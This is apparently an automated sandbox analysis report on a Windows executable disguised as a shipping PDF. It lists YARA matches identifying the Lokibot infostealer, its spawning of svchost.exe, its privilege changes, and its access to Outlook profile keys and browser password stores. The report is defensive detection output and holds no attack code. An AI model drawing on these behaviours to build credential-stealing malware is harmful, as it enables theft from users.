Source: Shipment Delivery No DE0093002-PDF.exe, 00000000.00000003.1705677236.000000000399D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Shipment Delivery No DE0093002-PDF.exe
Source: Shipment Delivery No DE0093002-PDF.exe, 00000000.00000003.1706006327.00000000037F3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Shipment Delivery No DE0093002-PDF.exe
Source: Shipment Delivery No DE0093002-PDF.exe, 00000002.00000003.1719051677.0000000003E8D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Shipment Delivery No DE0093002-PDF.exe
Source: Shipment Delivery No DE0093002-PDF.exe, 00000002.00000003.1719636429.0000000003D93000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Shipment Delivery No DE0093002-PDF.exe

Source: Shipment Delivery No DE0093002-PDF.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1708634601.0000000001970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1708634601.0000000001970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1708634601.0000000001970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000000.00000002.1708634601.0000000001970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1708634601.0000000001970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000002.00000002.1721699099.0000000001360000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000002.00000002.1721699099.0000000001360000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000002.00000002.1721699099.0000000001360000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000002.00000002.1721699099.0000000001360000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.1721699099.0000000001360000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000003.00000002.2937872020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000003.00000002.2937872020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000003.00000002.2937872020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000003.00000002.2937872020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.2937872020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: Process Memory Space: Shipment Delivery No DE0093002-PDF.exe PID: 7468, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: Shipment Delivery No DE0093002-PDF.exe PID: 7492, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 7536, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/8@1/1

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_0012A06A GetLastError,FormatMessageW,

0_2_0012A06A

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_001181CB AdjustTokenPrivileges,CloseHandle,	0_2_001181CB
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_001187E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_001187E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,	3_2_0040650A

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_0012B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0012B333

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_0013EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0013EE0D

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_0012C397 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0012C397

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_000C4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_000C4E89

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 3_2_006C3360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,

3_2_006C3360

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 3_2_006C3360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,

3_2_006C3360

Source: C:\Windows\SysWOW64\svchost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

File created: C:\Users\user\AppData\Local\Temp\aut9D1D.tmp

Jump to behavior

Source: Shipment Delivery No DE0093002-PDF.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: svchost.exe, 00000003.00000003.1720967954.0000000002715000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Shipment Delivery No DE0093002-PDF.exe	Virustotal: Detection: 32%
Source: Shipment Delivery No DE0093002-PDF.exe	ReversingLabs: Detection: 39%

Source: unknown	Process created: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe "C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe"
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe"
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Process created: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe "C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe"
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe"
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Process created: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe "C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: Shipment Delivery No DE0093002-PDF.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Shipment Delivery No DE0093002-PDF.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Shipment Delivery No DE0093002-PDF.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Shipment Delivery No DE0093002-PDF.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Shipment Delivery No DE0093002-PDF.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Shipment Delivery No DE0093002-PDF.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Shipment Delivery No DE0093002-PDF.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: Shipment Delivery No DE0093002-PDF.exe, 00000000.00000003.1705677236.0000000003870000.00000004.00001000.00020000.00000000.sdmp, Shipment Delivery No DE0093002-PDF.exe, 00000000.00000003.1706006327.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, Shipment Delivery No DE0093002-PDF.exe, 00000002.00000003.1720487157.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, Shipment Delivery No DE0093002-PDF.exe, 00000002.00000003.1719286949.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp
